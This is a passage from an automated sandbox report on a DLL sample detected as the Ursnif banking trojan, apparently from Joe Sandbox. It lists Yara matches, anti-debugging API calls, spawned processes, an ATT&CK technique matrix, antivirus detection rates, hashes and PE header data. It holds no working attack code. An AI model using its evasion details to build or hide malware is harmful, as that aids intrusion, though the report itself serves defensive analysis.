                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2209D6 push ecx; ret 0_2_6E2209E9
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E220075 push ecx; ret 0_2_6E220088
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E2209D6 push ecx; ret 2_2_6E2209E9
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E220075 push ecx; ret 2_2_6E220088
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2209D6 push ecx; ret 3_2_6E2209E9
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E220075 push ecx; ret 3_2_6E220088

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Yara detected UrsnifShow sources
                        Source: Yara matchFile source: ELQSEuKior.dll, type: SAMPLE
                        Source: Yara matchFile source: 15.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.486237999.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.507296216.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.485057539.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.503861971.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\loaddll32.exeAPI coverage: 5.0 %
                        Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.9 %
                        Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.2 %
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E241F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E241F6D
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24966F mov eax, dword ptr fs:[00000030h]0_2_6E24966F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E24966F mov eax, dword ptr fs:[00000030h]2_2_6E24966F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24966F mov eax, dword ptr fs:[00000030h]3_2_6E24966F
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E241F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E241F6D
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2207A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E2207A7
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E220288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E220288
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E241F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6E241F6D
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E2207A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6E2207A7
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E220288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6E220288
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E241F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E241F6D
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2207A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E2207A7
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E220288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E220288
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ELQSEuKior.dll',#1Jump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd IslandJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter mJump to behavior
                        Source: loaddll32.exe, 00000000.00000002.490278339.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.490903193.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.483251491.00000000039E0000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.474301611.0000000003510000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503824249.0000000003480000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.499291261.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000019.00000002.469760554.0000000002FD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                        Source: loaddll32.exe, 00000000.00000002.490278339.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.490903193.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.483251491.00000000039E0000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.474301611.0000000003510000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503824249.0000000003480000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.499291261.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000019.00000002.469760554.0000000002FD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                        Source: loaddll32.exe, 00000000.00000002.490278339.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.490903193.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.483251491.00000000039E0000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.474301611.0000000003510000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503824249.0000000003480000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.499291261.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000019.00000002.469760554.0000000002FD0000.00000002.00000001.sdmpBinary or memory string: Progman
                        Source: loaddll32.exe, 00000000.00000002.490278339.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.490903193.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.483251491.00000000039E0000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.474301611.0000000003510000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503824249.0000000003480000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.499291261.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000019.00000002.469760554.0000000002FD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E220604 cpuid 0_2_6E220604
                        Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E25DF65
                        Source: C:\Windows\System32\loaddll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_6E25DD96
                        Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E253952
                        Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E25E61F
                        Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6E25E6EC
                        Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6E25E518
                        Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E254323
                        Source: C:\Windows\System32\loaddll32.exeCode function: ___crtGetLocaleInfoEx,0_2_6E21F364
                        Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E25E3EF
                        Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E25E00E
                        Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E25E077
                        Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E25E112
                        Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E21F1B7
                        Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_6E25E19F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,2_2_6E25DF65
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_6E25DD96
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,2_2_6E253952
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,2_2_6E25E61F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_6E25E6EC
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_6E25E518
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,2_2_6E254323
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoEx,2_2_6E21F364
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,2_2_6E25E3EF
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,2_2_6E25E00E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,2_2_6E25E077
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,2_2_6E25E112
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,2_2_6E21F1B7
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_6E25E19F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E25DF65
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6E25DD96
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E253952
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E25E61F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6E25E6EC
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6E25E518
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E254323
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoEx,3_2_6E21F364
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E25E3EF
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E25E00E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E25E077
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E25E112
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E21F1B7
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6E25E19F
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E209A14 GetSystemTimeAsFileTime,0_2_6E209A14
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E258951 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_6E258951

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected UrsnifShow sources
                        Source: Yara matchFile source: ELQSEuKior.dll, type: SAMPLE
                        Source: Yara matchFile source: 15.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.486237999.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.507296216.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.485057539.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.503861971.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY

                        Remote Access Functionality:

                        barindex
                        Yara detected UrsnifShow sources
                        Source: Yara matchFile source: ELQSEuKior.dll, type: SAMPLE
                        Source: Yara matchFile source: 15.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.486237999.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.507296216.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.485057539.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.503861971.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1E16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_6E1E16BC
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E1E16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,2_2_6E1E16BC
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1E16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,3_2_6E1E16BC

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Rundll321Input Capture1System Time Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSystem Information Discovery22Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 449061 Sample: ELQSEuKior Startdate: 15/07/2021 Architecture: WINDOWS Score: 64 70 Antivirus / Scanner detection for submitted sample 2->70 72 Multi AV Scanner detection for submitted file 2->72 74 Yara detected  Ursnif 2->74 10 loaddll32.exe 1 2->10         started        process3 process4 12 cmd.exe 1 10->12         started        14 rundll32.exe 10->14         started        16 rundll32.exe 10->16         started        18 5 other processes 10->18 process5 20 rundll32.exe 12->20         started        22 cmd.exe 1 14->22         started        24 cmd.exe 1 14->24         started        26 cmd.exe 1 16->26         started        28 cmd.exe 1 16->28         started        30 cmd.exe 1 18->30         started        32 cmd.exe 1 18->32         started        34 cmd.exe 1 18->34         started        36 cmd.exe 1 18->36         started        process6 38 cmd.exe 1 20->38         started        40 cmd.exe 1 20->40         started        42 conhost.exe 22->42         started        44 conhost.exe 24->44         started        46 conhost.exe 26->46         started        48 conhost.exe 28->48         started        50 conhost.exe 30->50         started        52 conhost.exe 32->52         started        54 conhost.exe 34->54         started        process7 56 conhost.exe 38->56         started        58 conhost.exe 40->58         started        60 cmd.exe 1 42->60         started        62 cmd.exe 1 42->62         started        64 conhost.exe 46->64         started        process8 66 conhost.exe 56->66         started        68 conhost.exe 58->68         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        ELQSEuKior.dll68%VirustotalBrowse
                        ELQSEuKior.dll57%MetadefenderBrowse
                        ELQSEuKior.dll90%ReversingLabsWin32.Trojan.Ursnif
                        ELQSEuKior.dll100%AviraTR/Spy.Ursnif.ozghq

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        15.2.rundll32.exe.6e1e0000.1.unpack100%AviraHEUR/AGEN.1142290Download File
                        3.2.rundll32.exe.6e1e0000.1.unpack100%AviraHEUR/AGEN.1142290Download File
                        21.2.rundll32.exe.6e1e0000.1.unpack100%AviraHEUR/AGEN.1142290Download File
                        2.2.rundll32.exe.6e1e0000.1.unpack100%AviraHEUR/AGEN.1142290Download File
                        0.2.loaddll32.exe.6e1e0000.0.unpack100%AviraHEUR/AGEN.1142290Download File
                        25.2.rundll32.exe.6e1e0000.1.unpack100%AviraHEUR/AGEN.1142290Download File
                        12.2.rundll32.exe.6e1e0000.1.unpack100%AviraHEUR/AGEN.1142290Download File

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted IPs

                        No contacted IP infos

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:449061
                        Start date:15.07.2021
                        Start time:06:33:51
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 10s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:ELQSEuKior (renamed file extension from none to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:42
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal64.troj.winDLL@53/0@0/0
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 66.8% (good quality ratio 63%)
                        • Quality average: 77.4%
                        • Quality standard deviation: 28.1%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): wermgr.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.790060204441099
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:ELQSEuKior.dll
                        File size:960000
                        MD5:2f1e2c8b741594e48eea9cf01e24cdba
                        SHA1:d6a59cfcfd712ad2b7124a9f812d5c6ed328ab84
                        SHA256:ff12254275bb4cae4f1225535408dd466bf0a4d41727abca9576dbb427f44014
                        SHA512:5de31df5eaeeb3953c8c1ba809148fe05473fc654f9189093d3af0e4d5c4b841df98f6707d53a538e008f0a6ee4130929c4d0139bc6f7fb62a336600bb16a2ea
                        SSDEEP:24576:HQfpzjXPgf58CJV4X+IBIJ3cazaLwj1mCG9CpNiLi:IFDg9JV4OaIRj150CpNiLi
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0...0...0....{i.3...9...#...b...4...b...=...b...=....{r.&...0.......b.......b...1...b.b.1...0...1...b...1...Rich0..........

                        File Icon

                        Icon Hash:74f0e4ecccdce0e4

                        Static PE Info

                        General

                        Entrypoint:0x1040052
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x1000000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x5AC512FB [Wed Apr 4 18:01:31 2018 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:7a79d10b1d4343a18a4f6e25e165b4ae

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
